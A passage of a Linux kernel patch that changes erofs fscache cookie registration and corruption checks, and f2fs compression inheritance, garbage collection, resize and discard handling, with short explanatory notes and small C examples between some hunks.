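		printf("signed   \"-1\": %d\n", parse_val("-1", 1, &v)); /* 0 */
		return 0;
	}
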
+diff --git a/fs/erofs/fscache.c b/fs/erofs/fscache.c
+index af5ed6b9c54dd..6a792a513d6b8 100644
+--- a/fs/erofs/fscache.c
++++ b/fs/erofs/fscache.c
+@@ -494,7 +494,8 @@ static int erofs_fscache_register_domain(struct super_block *sb)
+ 
+ static
+ struct erofs_fscache *erofs_fscache_acquire_cookie(struct super_block *sb,
+-						    char *name, bool need_inode)
++						   char *name,
++						   unsigned int flags)
+ {
+ 	struct fscache_volume *volume = EROFS_SB(sb)->volume;
+ 	struct erofs_fscache *ctx;
+@@ -516,7 +517,7 @@ struct erofs_fscache *erofs_fscache_acquire_cookie(struct super_block *sb,
+ 	fscache_use_cookie(cookie, false);
+ 	ctx->cookie = cookie;
+ 
+-	if (need_inode) {
++	if (flags & EROFS_REG_COOKIE_NEED_INODE) {
+ 		struct inode *const inode = new_inode(sb);
+ 
+ 		if (!inode) {
+@@ -554,14 +555,15 @@ static void erofs_fscache_relinquish_cookie(struct erofs_fscache *ctx)
+ 
+ static
+ struct erofs_fscache *erofs_fscache_domain_init_cookie(struct super_block *sb,
+-		char *name, bool need_inode)
++						       char *name,
++						       unsigned int flags)
+ {
+ 	int err;
+ 	struct inode *inode;
+ 	struct erofs_fscache *ctx;
+ 	struct erofs_domain *domain = EROFS_SB(sb)->domain;
+ 
+-	ctx = erofs_fscache_acquire_cookie(sb, name, need_inode);
++	ctx = erofs_fscache_acquire_cookie(sb, name, flags);
+ 	if (IS_ERR(ctx))
+ 		return ctx;
+ 
+@@ -589,7 +591,8 @@ out:
+ 
+ static
+ struct erofs_fscache *erofs_domain_register_cookie(struct super_block *sb,
+-						   char *name, bool need_inode)
++						   char *name,
++						   unsigned int flags)
+ {
+ 	struct inode *inode;
+ 	struct erofs_fscache *ctx;
+@@ -602,23 +605,30 @@ struct erofs_fscache *erofs_domain_register_cookie(struct super_block *sb,
+ 		ctx = inode->i_private;
+ 		if (!ctx || ctx->domain != domain || strcmp(ctx->name, name))
+ 			continue;
+-		igrab(inode);
++		if (!(flags & EROFS_REG_COOKIE_NEED_NOEXIST)) {
++			igrab(inode);
++		} else {
++			erofs_err(sb, "%s already exists in domain %s", name,
++				  domain->domain_id);
++			ctx = ERR_PTR(-EEXIST);
++		}
+ 		spin_unlock(&psb->s_inode_list_lock);
+ 		mutex_unlock(&erofs_domain_cookies_lock);
+ 		return ctx;
+ 	}
+ 	spin_unlock(&psb->s_inode_list_lock);
+-	ctx = erofs_fscache_domain_init_cookie(sb, name, need_inode);
++	ctx = erofs_fscache_domain_init_cookie(sb, name, flags);
+ 	mutex_unlock(&erofs_domain_cookies_lock);
+ 	return ctx;
+ }
+ 
+ struct erofs_fscache *erofs_fscache_register_cookie(struct super_block *sb,
+-						    char *name, bool need_inode)
++						    char *name,
++						    unsigned int flags)
+ {
+ 	if (EROFS_SB(sb)->domain_id)
+-		return erofs_domain_register_cookie(sb, name, need_inode);
+-	return erofs_fscache_acquire_cookie(sb, name, need_inode);
++		return erofs_domain_register_cookie(sb, name, flags);
++	return erofs_fscache_acquire_cookie(sb, name, flags);
+ }
+ 
+ void erofs_fscache_unregister_cookie(struct erofs_fscache *ctx)
+@@ -647,6 +657,7 @@ int erofs_fscache_register_fs(struct super_block *sb)
+ 	int ret;
+ 	struct erofs_sb_info *sbi = EROFS_SB(sb);
+ 	struct erofs_fscache *fscache;
++	unsigned int flags;
+ 
+ 	if (sbi->domain_id)
+ 		ret = erofs_fscache_register_domain(sb);
+@@ -655,8 +666,20 @@ int erofs_fscache_register_fs(struct super_block *sb)
+ 	if (ret)
+ 		return ret;
+ 
+-	/* acquired domain/volume will be relinquished in kill_sb() on error */
+-	fscache = erofs_fscache_register_cookie(sb, sbi->fsid, true);
++	/*
++	 * When shared domain is enabled, using NEED_NOEXIST to guarantee
++	 * the primary data blob (aka fsid) is unique in the shared domain.
++	 *
++	 * For non-shared-domain case, fscache_acquire_volume() invoked by
++	 * erofs_fscache_register_volume() has already guaranteed
++	 * the uniqueness of primary data blob.
++	 *
++	 * Acquired domain/volume will be relinquished in kill_sb() on error.
++	 */
++	flags = EROFS_REG_COOKIE_NEED_INODE;
++	if (sbi->domain_id)
++		flags |= EROFS_REG_COOKIE_NEED_NOEXIST;
++	fscache = erofs_fscache_register_cookie(sb, sbi->fsid, flags);
+ 	if (IS_ERR(fscache))
+ 		return PTR_ERR(fscache);
+ 
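
Turning the bool need_inode parameter into a flags word is what lets NEED_NOEXIST ride along without growing the argument list. The pattern in miniature, with invented names:

	#include <stdio.h>

	#define REG_NEED_INODE   0x1    /* also allocate a backing inode */
	#define REG_NEED_NOEXIST 0x2    /* fail if the cookie already exists */

	static int register_cookie(const char *name, unsigned int flags)
	{
		if (flags & REG_NEED_NOEXIST)
			printf("%s: enforcing uniqueness\n", name);
		if (flags & REG_NEED_INODE)
			printf("%s: allocating inode\n", name);
		return 0;
	}

	int main(void)
	{
		/* The primary blob wants both behaviors; extra blobs neither. */
		register_cookie("fsid", REG_NEED_INODE | REG_NEED_NOEXIST);
		register_cookie("device", 0);
		return 0;
	}
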
+diff --git a/fs/erofs/internal.h b/fs/erofs/internal.h
+index 05dc686277220..e51f27b6bde15 100644
+--- a/fs/erofs/internal.h
++++ b/fs/erofs/internal.h
+@@ -604,13 +604,18 @@ static inline int z_erofs_load_lzma_config(struct super_block *sb,
+ }
+ #endif	/* !CONFIG_EROFS_FS_ZIP */
+ 
++/* flags for erofs_fscache_register_cookie() */
++#define EROFS_REG_COOKIE_NEED_INODE	1
++#define EROFS_REG_COOKIE_NEED_NOEXIST	2
++
+ /* fscache.c */
+ #ifdef CONFIG_EROFS_FS_ONDEMAND
+ int erofs_fscache_register_fs(struct super_block *sb);
+ void erofs_fscache_unregister_fs(struct super_block *sb);
+ 
+ struct erofs_fscache *erofs_fscache_register_cookie(struct super_block *sb,
+-						     char *name, bool need_inode);
++						    char *name,
++						    unsigned int flags);
+ void erofs_fscache_unregister_cookie(struct erofs_fscache *fscache);
+ 
+ extern const struct address_space_operations erofs_fscache_access_aops;
+@@ -623,7 +628,8 @@ static inline void erofs_fscache_unregister_fs(struct super_block *sb) {}
+ 
+ static inline
+ struct erofs_fscache *erofs_fscache_register_cookie(struct super_block *sb,
+-						     char *name, bool need_inode)
++						     char *name,
++						     unsigned int flags)
+ {
+ 	return ERR_PTR(-EOPNOTSUPP);
+ }
+diff --git a/fs/erofs/super.c b/fs/erofs/super.c
+index 1c7dcca702b3e..481788c24a68b 100644
+--- a/fs/erofs/super.c
++++ b/fs/erofs/super.c
+@@ -245,7 +245,7 @@ static int erofs_init_device(struct erofs_buf *buf, struct super_block *sb,
+ 	}
+ 
+ 	if (erofs_is_fscache_mode(sb)) {
+-		fscache = erofs_fscache_register_cookie(sb, dif->path, false);
++		fscache = erofs_fscache_register_cookie(sb, dif->path, 0);
+ 		if (IS_ERR(fscache))
+ 			return PTR_ERR(fscache);
+ 		dif->fscache = fscache;
+diff --git a/fs/erofs/zdata.c b/fs/erofs/zdata.c
+index b792d424d774c..cf4871834ebb2 100644
+--- a/fs/erofs/zdata.c
++++ b/fs/erofs/zdata.c
+@@ -488,7 +488,8 @@ static int z_erofs_register_pcluster(struct z_erofs_decompress_frontend *fe)
+ 	struct erofs_workgroup *grp;
+ 	int err;
+ 
+-	if (!(map->m_flags & EROFS_MAP_ENCODED)) {
++	if (!(map->m_flags & EROFS_MAP_ENCODED) ||
++	    (!ztailpacking && !(map->m_pa >> PAGE_SHIFT))) {
+ 		DBG_BUGON(1);
+ 		return -EFSCORRUPTED;
+ 	}
+diff --git a/fs/erofs/zmap.c b/fs/erofs/zmap.c
+index 0bb66927e3d06..e6d5d7a18fb06 100644
+--- a/fs/erofs/zmap.c
++++ b/fs/erofs/zmap.c
+@@ -694,10 +694,15 @@ static int z_erofs_do_map_blocks(struct inode *inode,
+ 		map->m_pa = blknr_to_addr(m.pblk);
+ 		err = z_erofs_get_extent_compressedlen(&m, initial_lcn);
+ 		if (err)
+-			goto out;
++			goto unmap_out;
+ 	}
+ 
+ 	if (m.headtype == Z_EROFS_VLE_CLUSTER_TYPE_PLAIN) {
++		if (map->m_llen > map->m_plen) {
++			DBG_BUGON(1);
++			err = -EFSCORRUPTED;
++			goto unmap_out;
++		}
+ 		if (vi->z_advise & Z_EROFS_ADVISE_INTERLACED_PCLUSTER)
+ 			map->m_algorithmformat =
+ 				Z_EROFS_COMPRESSION_INTERLACED;
+@@ -718,14 +723,12 @@ static int z_erofs_do_map_blocks(struct inode *inode,
+ 		if (!err)
+ 			map->m_flags |= EROFS_MAP_FULL_MAPPED;
+ 	}
++
+ unmap_out:
+ 	erofs_unmap_metabuf(&m.map->buf);
+-
+-out:
+ 	erofs_dbg("%s, m_la %llu m_pa %llu m_llen %llu m_plen %llu m_flags 0%o",
+ 		  __func__, map->m_la, map->m_pa,
+ 		  map->m_llen, map->m_plen, map->m_flags);
+-
+ 	return err;
+ }
+ 
+diff --git a/fs/f2fs/compress.c b/fs/f2fs/compress.c
+index d315c2de136f2..74d3f2d2271f3 100644
+--- a/fs/f2fs/compress.c
++++ b/fs/f2fs/compress.c
+@@ -346,7 +346,7 @@ static int zstd_init_compress_ctx(struct compress_ctx *cc)
+ 	if (!level)
+ 		level = F2FS_ZSTD_DEFAULT_CLEVEL;
+ 
+-	params = zstd_get_params(F2FS_ZSTD_DEFAULT_CLEVEL, cc->rlen);
++	params = zstd_get_params(level, cc->rlen);
+ 	workspace_size = zstd_cstream_workspace_bound(&params.cParams);
+ 
+ 	workspace = f2fs_kvmalloc(F2FS_I_SB(cc->inode),
+diff --git a/fs/f2fs/f2fs.h b/fs/f2fs/f2fs.h
+index e6355a5683b75..8b9f0b3c77232 100644
+--- a/fs/f2fs/f2fs.h
++++ b/fs/f2fs/f2fs.h
+@@ -2974,7 +2974,7 @@ static inline void f2fs_change_bit(unsigned int nr, char *addr)
+ /* Flags that should be inherited by new inodes from their parent. */
+ #define F2FS_FL_INHERITED (F2FS_SYNC_FL | F2FS_NODUMP_FL | F2FS_NOATIME_FL | \
+ 			   F2FS_DIRSYNC_FL | F2FS_PROJINHERIT_FL | \
+-			   F2FS_CASEFOLD_FL | F2FS_COMPR_FL | F2FS_NOCOMP_FL)
++			   F2FS_CASEFOLD_FL)
+ 
+ /* Flags that are appropriate for regular files (all but dir-specific ones). */
+ #define F2FS_REG_FLMASK		(~(F2FS_DIRSYNC_FL | F2FS_PROJINHERIT_FL | \
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index 82cda12582272..f96bbfa8b3991 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -1915,6 +1915,10 @@ static int f2fs_setflags_common(struct inode *inode, u32 iflags, u32 mask)
+ 			if (!f2fs_disable_compressed_file(inode))
+ 				return -EINVAL;
+ 		} else {
++			/* try to convert inline_data to support compression */
++			int err = f2fs_convert_inline_inode(inode);
++			if (err)
++				return err;
+ 			if (!f2fs_may_compress(inode))
+ 				return -EINVAL;
+ 			if (S_ISREG(inode->i_mode) && F2FS_HAS_BLOCKS(inode))
+diff --git a/fs/f2fs/gc.c b/fs/f2fs/gc.c
+index 4546e01b2ee08..22c1f876e8c52 100644
+--- a/fs/f2fs/gc.c
++++ b/fs/f2fs/gc.c
+@@ -96,16 +96,6 @@ static int gc_thread_func(void *data)
+ 		 * invalidated soon after by user update or deletion.
+ 		 * So, I'd like to wait some time to collect dirty segments.
+ 		 */
+-		if (sbi->gc_mode == GC_URGENT_HIGH) {
+-			spin_lock(&sbi->gc_urgent_high_lock);
+-			if (sbi->gc_urgent_high_remaining) {
+-				sbi->gc_urgent_high_remaining--;
+-				if (!sbi->gc_urgent_high_remaining)
+-					sbi->gc_mode = GC_NORMAL;
+-			}
+-			spin_unlock(&sbi->gc_urgent_high_lock);
+-		}
+-
+ 		if (sbi->gc_mode == GC_URGENT_HIGH ||
+ 				sbi->gc_mode == GC_URGENT_MID) {
+ 			wait_ms = gc_th->urgent_sleep_time;
+@@ -162,6 +152,15 @@ do_gc:
+ 		/* balancing f2fs's metadata periodically */
+ 		f2fs_balance_fs_bg(sbi, true);
+ next:
++		if (sbi->gc_mode == GC_URGENT_HIGH) {
++			spin_lock(&sbi->gc_urgent_high_lock);
++			if (sbi->gc_urgent_high_remaining) {
++				sbi->gc_urgent_high_remaining--;
++				if (!sbi->gc_urgent_high_remaining)
++					sbi->gc_mode = GC_NORMAL;
++			}
++			spin_unlock(&sbi->gc_urgent_high_lock);
++		}
+ 		sb_end_write(sbi->sb);
+ 
+ 	} while (!kthread_should_stop());
+@@ -1744,8 +1743,9 @@ freed:
+ 				get_valid_blocks(sbi, segno, false) == 0)
+ 			seg_freed++;
+ 
+-		if (__is_large_section(sbi) && segno + 1 < end_segno)
+-			sbi->next_victim_seg[gc_type] = segno + 1;
++		if (__is_large_section(sbi))
++			sbi->next_victim_seg[gc_type] =
++				(segno + 1 < end_segno) ? segno + 1 : NULL_SEGNO;
+ skip:
+ 		f2fs_put_page(sum_page, 0);
+ 	}
+@@ -2133,8 +2133,6 @@ out_unlock:
+ 	if (err)
+ 		return err;
+ 
+-	set_sbi_flag(sbi, SBI_IS_RESIZEFS);
+-
+ 	freeze_super(sbi->sb);
+ 	f2fs_down_write(&sbi->gc_lock);
+ 	f2fs_down_write(&sbi->cp_global_sem);
+@@ -2150,6 +2148,7 @@ out_unlock:
+ 	if (err)
+ 		goto out_err;
+ 
++	set_sbi_flag(sbi, SBI_IS_RESIZEFS);
+ 	err = free_segment_range(sbi, secs, false);
+ 	if (err)
+ 		goto recover_out;
+@@ -2173,6 +2172,7 @@ out_unlock:
+ 		f2fs_commit_super(sbi, false);
+ 	}
+ recover_out:
++	clear_sbi_flag(sbi, SBI_IS_RESIZEFS);
+ 	if (err) {
+ 		set_sbi_flag(sbi, SBI_NEED_FSCK);
+ 		f2fs_err(sbi, "resize_fs failed, should run fsck to repair!");
+@@ -2185,6 +2185,5 @@ out_err:
+ 	f2fs_up_write(&sbi->cp_global_sem);
+ 	f2fs_up_write(&sbi->gc_lock);
+ 	thaw_super(sbi->sb);
+-	clear_sbi_flag(sbi, SBI_IS_RESIZEFS);
+ 	return err;
+ }
+diff --git a/fs/f2fs/namei.c b/fs/f2fs/namei.c
+index a389772fd212a..b6c14c9c33a08 100644
+--- a/fs/f2fs/namei.c
++++ b/fs/f2fs/namei.c
+@@ -22,8 +22,163 @@
+ #include "acl.h"
+ #include <trace/events/f2fs.h>
+ 
++static inline int is_extension_exist(const unsigned char *s, const char *sub,
++						bool tmp_ext)
++{
++	size_t slen = strlen(s);
++	size_t sublen = strlen(sub);
++	int i;
++
++	if (sublen == 1 && *sub == '*')
++		return 1;
++
++	/*
++	 * filename format of multimedia file should be defined as:
++	 * "filename + '.' + extension + (optional: '.' + temp extension)".
++	 */
++	if (slen < sublen + 2)
++		return 0;
++
++	if (!tmp_ext) {
++		/* file has no temp extension */
++		if (s[slen - sublen - 1] != '.')
++			return 0;
++		return !strncasecmp(s + slen - sublen, sub, sublen);
++	}
++
++	for (i = 1; i < slen - sublen; i++) {
++		if (s[i] != '.')
++			continue;
++		if (!strncasecmp(s + i + 1, sub, sublen))
++			return 1;
++	}
++
++	return 0;
++}
++
++int f2fs_update_extension_list(struct f2fs_sb_info *sbi, const char *name,
++							bool hot, bool set)
++{
++	__u8 (*extlist)[F2FS_EXTENSION_LEN] = sbi->raw_super->extension_list;
++	int cold_count = le32_to_cpu(sbi->raw_super->extension_count);
++	int hot_count = sbi->raw_super->hot_ext_count;
++	int total_count = cold_count + hot_count;
++	int start, count;
++	int i;
++
++	if (set) {
++		if (total_count == F2FS_MAX_EXTENSION)
++			return -EINVAL;
++	} else {
++		if (!hot && !cold_count)
++			return -EINVAL;
++		if (hot && !hot_count)
++			return -EINVAL;
++	}
++
++	if (hot) {
++		start = cold_count;
++		count = total_count;
++	} else {
++		start = 0;
++		count = cold_count;
++	}
++
++	for (i = start; i < count; i++) {
++		if (strcmp(name, extlist[i]))
++			continue;
++
++		if (set)
++			return -EINVAL;
++
++		memcpy(extlist[i], extlist[i + 1],
++				F2FS_EXTENSION_LEN * (total_count - i - 1));
++		memset(extlist[total_count - 1], 0, F2FS_EXTENSION_LEN);
++		if (hot)
++			sbi->raw_super->hot_ext_count = hot_count - 1;
++		else
++			sbi->raw_super->extension_count =
++						cpu_to_le32(cold_count - 1);
++		return 0;
++	}
++
++	if (!set)
++		return -EINVAL;
++
++	if (hot) {
++		memcpy(extlist[count], name, strlen(name));
++		sbi->raw_super->hot_ext_count = hot_count + 1;
++	} else {
++		char buf[F2FS_MAX_EXTENSION][F2FS_EXTENSION_LEN];
++
++		memcpy(buf, &extlist[cold_count],
++				F2FS_EXTENSION_LEN * hot_count);
++		memset(extlist[cold_count], 0, F2FS_EXTENSION_LEN);
++		memcpy(extlist[cold_count], name, strlen(name));
++		memcpy(&extlist[cold_count + 1], buf,
++				F2FS_EXTENSION_LEN * hot_count);
++		sbi->raw_super->extension_count = cpu_to_le32(cold_count + 1);
++	}
++	return 0;
++}
++
++static void set_compress_new_inode(struct f2fs_sb_info *sbi, struct inode *dir,
++				struct inode *inode, const unsigned char *name)
++{
++	__u8 (*extlist)[F2FS_EXTENSION_LEN] = sbi->raw_super->extension_list;
++	unsigned char (*noext)[F2FS_EXTENSION_LEN] =
++						F2FS_OPTION(sbi).noextensions;
++	unsigned char (*ext)[F2FS_EXTENSION_LEN] = F2FS_OPTION(sbi).extensions;
++	unsigned char ext_cnt = F2FS_OPTION(sbi).compress_ext_cnt;
++	unsigned char noext_cnt = F2FS_OPTION(sbi).nocompress_ext_cnt;
++	int i, cold_count, hot_count;
++
++	if (!f2fs_sb_has_compression(sbi))
++		return;
++
++	if (S_ISDIR(inode->i_mode))
++		goto inherit_comp;
++
++	/* This name comes only from normal files. */
++	if (!name)
++		return;
++
++	/* Don't compress hot files. */
++	f2fs_down_read(&sbi->sb_lock);
++	cold_count = le32_to_cpu(sbi->raw_super->extension_count);
++	hot_count = sbi->raw_super->hot_ext_count;
++	for (i = cold_count; i < cold_count + hot_count; i++)
++		if (is_extension_exist(name, extlist[i], false))
++			break;
++	f2fs_up_read(&sbi->sb_lock);
++	if (i < (cold_count + hot_count))
++		return;
++
++	/* Don't compress unallowed extension. */
++	for (i = 0; i < noext_cnt; i++)
++		if (is_extension_exist(name, noext[i], false))
++			return;
++
++	/* Compress wanting extension. */
++	for (i = 0; i < ext_cnt; i++) {
++		if (is_extension_exist(name, ext[i], false)) {
++			set_compress_context(inode);
++			return;
++		}
++	}
++inherit_comp:
++	/* Inherit the {no-}compression flag in directory */
++	if (F2FS_I(dir)->i_flags & F2FS_NOCOMP_FL) {
++		F2FS_I(inode)->i_flags |= F2FS_NOCOMP_FL;
++		f2fs_mark_inode_dirty_sync(inode, true);
++	} else if (F2FS_I(dir)->i_flags & F2FS_COMPR_FL) {
++		set_compress_context(inode);
++	}
++}
++
+ static struct inode *f2fs_new_inode(struct user_namespace *mnt_userns,
+-						struct inode *dir, umode_t mode)
++						struct inode *dir, umode_t mode,
++						const char *name)
+ {
+ 	struct f2fs_sb_info *sbi = F2FS_I_SB(dir);
+ 	nid_t ino;
+@@ -114,12 +269,8 @@ static struct inode *f2fs_new_inode(struct user_namespace *mnt_userns,
+ 	if (F2FS_I(inode)->i_flags & F2FS_PROJINHERIT_FL)
+ 		set_inode_flag(inode, FI_PROJ_INHERIT);
+ 
+-	if (f2fs_sb_has_compression(sbi)) {
+-		/* Inherit the compression flag in directory */
+-		if ((F2FS_I(dir)->i_flags & F2FS_COMPR_FL) &&
+-					f2fs_may_compress(inode))
+-			set_compress_context(inode);
+-	}
++	/* Check compression first. */
++	set_compress_new_inode(sbi, dir, inode, name);
+ 
+ 	/* Should enable inline_data after compression set */
+ 	if (test_opt(sbi, INLINE_DATA) && f2fs_may_inline_data(inode))
+@@ -153,40 +304,6 @@ fail_drop:
+ 	return ERR_PTR(err);
+ }
+ 
+-static inline int is_extension_exist(const unsigned char *s, const char *sub,
+-						bool tmp_ext)
+-{
+-	size_t slen = strlen(s);
+-	size_t sublen = strlen(sub);
+-	int i;
+-
+-	if (sublen == 1 && *sub == '*')
+-		return 1;
+-
+-	/*
+-	 * filename format of multimedia file should be defined as:
+-	 * "filename + '.' + extension + (optional: '.' + temp extension)".
+-	 */
+-	if (slen < sublen + 2)
+-		return 0;
+-
+-	if (!tmp_ext) {
+-		/* file has no temp extension */
+-		if (s[slen - sublen - 1] != '.')
+-			return 0;
+-		return !strncasecmp(s + slen - sublen, sub, sublen);
+-	}
+-
+-	for (i = 1; i < slen - sublen; i++) {
+-		if (s[i] != '.')
+-			continue;
+-		if (!strncasecmp(s + i + 1, sub, sublen))
+-			return 1;
+-	}
+-
+-	return 0;
+-}
+-
+ /*
+  * Set file's temperature for hot/cold data separation
+  */
+@@ -217,124 +334,6 @@ static inline void set_file_temperature(struct f2fs_sb_info *sbi, struct inode *
+ 		file_set_hot(inode);
+ }
+ 
+-int f2fs_update_extension_list(struct f2fs_sb_info *sbi, const char *name,
+-							bool hot, bool set)
+-{
+-	__u8 (*extlist)[F2FS_EXTENSION_LEN] = sbi->raw_super->extension_list;
+-	int cold_count = le32_to_cpu(sbi->raw_super->extension_count);
+-	int hot_count = sbi->raw_super->hot_ext_count;
+-	int total_count = cold_count + hot_count;
+-	int start, count;
+-	int i;
+-
+-	if (set) {
+-		if (total_count == F2FS_MAX_EXTENSION)
+-			return -EINVAL;
+-	} else {
+-		if (!hot && !cold_count)
+-			return -EINVAL;
+-		if (hot && !hot_count)
+-			return -EINVAL;
+-	}
+-
+-	if (hot) {
+-		start = cold_count;
+-		count = total_count;
+-	} else {
+-		start = 0;
+-		count = cold_count;
+-	}
+-
+-	for (i = start; i < count; i++) {
+-		if (strcmp(name, extlist[i]))
+-			continue;
+-
+-		if (set)
+-			return -EINVAL;
+-
+-		memcpy(extlist[i], extlist[i + 1],
+-				F2FS_EXTENSION_LEN * (total_count - i - 1));
+-		memset(extlist[total_count - 1], 0, F2FS_EXTENSION_LEN);
+-		if (hot)
+-			sbi->raw_super->hot_ext_count = hot_count - 1;
+-		else
+-			sbi->raw_super->extension_count =
+-						cpu_to_le32(cold_count - 1);
+-		return 0;
+-	}
+-
+-	if (!set)
+-		return -EINVAL;
+-
+-	if (hot) {
+-		memcpy(extlist[count], name, strlen(name));
+-		sbi->raw_super->hot_ext_count = hot_count + 1;
+-	} else {
+-		char buf[F2FS_MAX_EXTENSION][F2FS_EXTENSION_LEN];
+-
+-		memcpy(buf, &extlist[cold_count],
+-				F2FS_EXTENSION_LEN * hot_count);
+-		memset(extlist[cold_count], 0, F2FS_EXTENSION_LEN);
+-		memcpy(extlist[cold_count], name, strlen(name));
+-		memcpy(&extlist[cold_count + 1], buf,
+-				F2FS_EXTENSION_LEN * hot_count);
+-		sbi->raw_super->extension_count = cpu_to_le32(cold_count + 1);
+-	}
+-	return 0;
+-}
+-
+-static void set_compress_inode(struct f2fs_sb_info *sbi, struct inode *inode,
+-						const unsigned char *name)
+-{
+-	__u8 (*extlist)[F2FS_EXTENSION_LEN] = sbi->raw_super->extension_list;
+-	unsigned char (*noext)[F2FS_EXTENSION_LEN] = F2FS_OPTION(sbi).noextensions;
+-	unsigned char (*ext)[F2FS_EXTENSION_LEN] = F2FS_OPTION(sbi).extensions;
+-	unsigned char ext_cnt = F2FS_OPTION(sbi).compress_ext_cnt;
+-	unsigned char noext_cnt = F2FS_OPTION(sbi).nocompress_ext_cnt;
+-	int i, cold_count, hot_count;
+-
+-	if (!f2fs_sb_has_compression(sbi) ||
+-			F2FS_I(inode)->i_flags & F2FS_NOCOMP_FL ||
+-			!f2fs_may_compress(inode) ||
+-			(!ext_cnt && !noext_cnt))
+-		return;
+-
+-	f2fs_down_read(&sbi->sb_lock);
+-
+-	cold_count = le32_to_cpu(sbi->raw_super->extension_count);
+-	hot_count = sbi->raw_super->hot_ext_count;
+-
+-	for (i = cold_count; i < cold_count + hot_count; i++) {
+-		if (is_extension_exist(name, extlist[i], false)) {
+-			f2fs_up_read(&sbi->sb_lock);
+-			return;
+-		}
+-	}
+-
+-	f2fs_up_read(&sbi->sb_lock);
+-
+-	for (i = 0; i < noext_cnt; i++) {
+-		if (is_extension_exist(name, noext[i], false)) {
+-			f2fs_disable_compressed_file(inode);
+-			return;
+-		}
+-	}
+-
+-	if (is_inode_flag_set(inode, FI_COMPRESSED_FILE))
+-		return;
+-
+-	for (i = 0; i < ext_cnt; i++) {
+-		if (!is_extension_exist(name, ext[i], false))
+-			continue;
+-
+-		/* Do not use inline_data with compression */
+-		stat_dec_inline_inode(inode);
+-		clear_inode_flag(inode, FI_INLINE_DATA);
+-		set_compress_context(inode);
+-		return;
+-	}
+-}
+-
+ static int f2fs_create(struct user_namespace *mnt_userns, struct inode *dir,
+ 		       struct dentry *dentry, umode_t mode, bool excl)
+ {
+@@ -352,15 +351,13 @@ static int f2fs_create(struct user_namespace *mnt_userns, struct inode *dir,
+ 	if (err)
+ 		return err;
+ 
+-	inode = f2fs_new_inode(mnt_userns, dir, mode);
++	inode = f2fs_new_inode(mnt_userns, dir, mode, dentry->d_name.name);
+ 	if (IS_ERR(inode))
+ 		return PTR_ERR(inode);
+ 
+ 	if (!test_opt(sbi, DISABLE_EXT_IDENTIFY))
+ 		set_file_temperature(sbi, inode, dentry->d_name.name);
+ 
+-	set_compress_inode(sbi, inode, dentry->d_name.name);
+-
+ 	inode->i_op = &f2fs_file_inode_operations;
+ 	inode->i_fop = &f2fs_file_operations;
+ 	inode->i_mapping->a_ops = &f2fs_dblock_aops;
+@@ -689,7 +686,7 @@ static int f2fs_symlink(struct user_namespace *mnt_userns, struct inode *dir,
+ 	if (err)
+ 		return err;
+ 
+-	inode = f2fs_new_inode(mnt_userns, dir, S_IFLNK | S_IRWXUGO);
++	inode = f2fs_new_inode(mnt_userns, dir, S_IFLNK | S_IRWXUGO, NULL);
+ 	if (IS_ERR(inode))
+ 		return PTR_ERR(inode);
+ 
+@@ -760,7 +757,7 @@ static int f2fs_mkdir(struct user_namespace *mnt_userns, struct inode *dir,
+ 	if (err)
+ 		return err;
+ 
+-	inode = f2fs_new_inode(mnt_userns, dir, S_IFDIR | mode);
++	inode = f2fs_new_inode(mnt_userns, dir, S_IFDIR | mode, NULL);
+ 	if (IS_ERR(inode))
+ 		return PTR_ERR(inode);
+ 
+@@ -817,7 +814,7 @@ static int f2fs_mknod(struct user_namespace *mnt_userns, struct inode *dir,
+ 	if (err)
+ 		return err;
+ 
+-	inode = f2fs_new_inode(mnt_userns, dir, mode);
++	inode = f2fs_new_inode(mnt_userns, dir, mode, NULL);
+ 	if (IS_ERR(inode))
+ 		return PTR_ERR(inode);
+ 
+@@ -856,7 +853,7 @@ static int __f2fs_tmpfile(struct user_namespace *mnt_userns, struct inode *dir,
+ 	if (err)
+ 		return err;
+ 
+-	inode = f2fs_new_inode(mnt_userns, dir, mode);
++	inode = f2fs_new_inode(mnt_userns, dir, mode, NULL);
+ 	if (IS_ERR(inode))
+ 		return PTR_ERR(inode);
+ 
+diff --git a/fs/f2fs/segment.c b/fs/f2fs/segment.c
+index acf3d3fa43635..c1d0713666ee5 100644
+--- a/fs/f2fs/segment.c
++++ b/fs/f2fs/segment.c
+@@ -1170,7 +1170,7 @@ submit:
+ 
+ 		atomic_inc(&dcc->issued_discard);
+ 
+-		f2fs_update_iostat(sbi, NULL, FS_DISCARD, 1);
++		f2fs_update_iostat(sbi, NULL, FS_DISCARD, len * F2FS_BLKSIZE);
+ 
+ 		lstart += len;
+ 		start += len;
+@@ -1448,7 +1448,7 @@ retry:
+ 		if (i + 1 < dpolicy->granularity)
+ 			break;
+ 
+-		if (i < DEFAULT_DISCARD_GRANULARITY && dpolicy->ordered)
++		if (i + 1 < DEFAULT_DISCARD_GRANULARITY && dpolicy->ordered)
+ 			return __issue_discard_cmd_orderly(sbi, dpolicy);
+ 
+ 		pend_list = &dcc->pend_list[i];
+@@ -2025,8 +2025,10 @@ int f2fs_start_discard_thread(struct f2fs_sb_info *sbi)
+ 
+ 	dcc->f2fs_issue_discard = kthread_run(issue_discard_thread, sbi,
+ 				"f2fs_discard-%u:%u", MAJOR(dev), MINOR(dev));
+-	if (IS_ERR(dcc->f2fs_issue_discard))
++	if (IS_ERR(dcc->f2fs_issue_discard)) {
+ 		err = PTR_ERR(dcc->f2fs_issue_discard);
++		dcc->f2fs_issue_discard = NULL;
++	}
+ 
+ 	return err;
+ }
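
Resetting dcc->f2fs_issue_discard after a failed kthread_run() matters because teardown paths test that pointer before calling kthread_stop(); a leftover ERR_PTR() would be treated as a live thread. The hazard sketched with userspace stand-ins for ERR_PTR()/IS_ERR():

	#include <stdint.h>
	#include <stdio.h>

	/* Userspace stand-ins for the kernel's ERR_PTR()/IS_ERR() idiom. */
	#define ERR_PTR(err)  ((void *)(intptr_t)(err))
	#define IS_ERR(p)     ((uintptr_t)(p) >= (uintptr_t)-4095)

	static int running;             /* stand-in for a real worker thread */
	static void *worker;            /* consulted later by the stop path */

	static void stop_worker(void)
	{
		if (worker)             /* would treat a stale ERR_PTR as live */
			printf("stopping worker at %p\n", worker);
	}

	static int start_worker(int fail)
	{
		void *p = fail ? ERR_PTR(-12) : &running;

		if (IS_ERR(p)) {
			worker = NULL;  /* the fix: never store the error value */
			return (int)(intptr_t)p;
		}
		worker = p;
		return 0;
	}

	int main(void)
	{
		start_worker(1);
		stop_worker();          /* safe: worker is NULL, not an ERR_PTR */
		return 0;
	}
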
+diff --git a/fs/f2fs/super.c b/fs/f2fs/super.c
+index 3834ead046200..67d51f5276061 100644
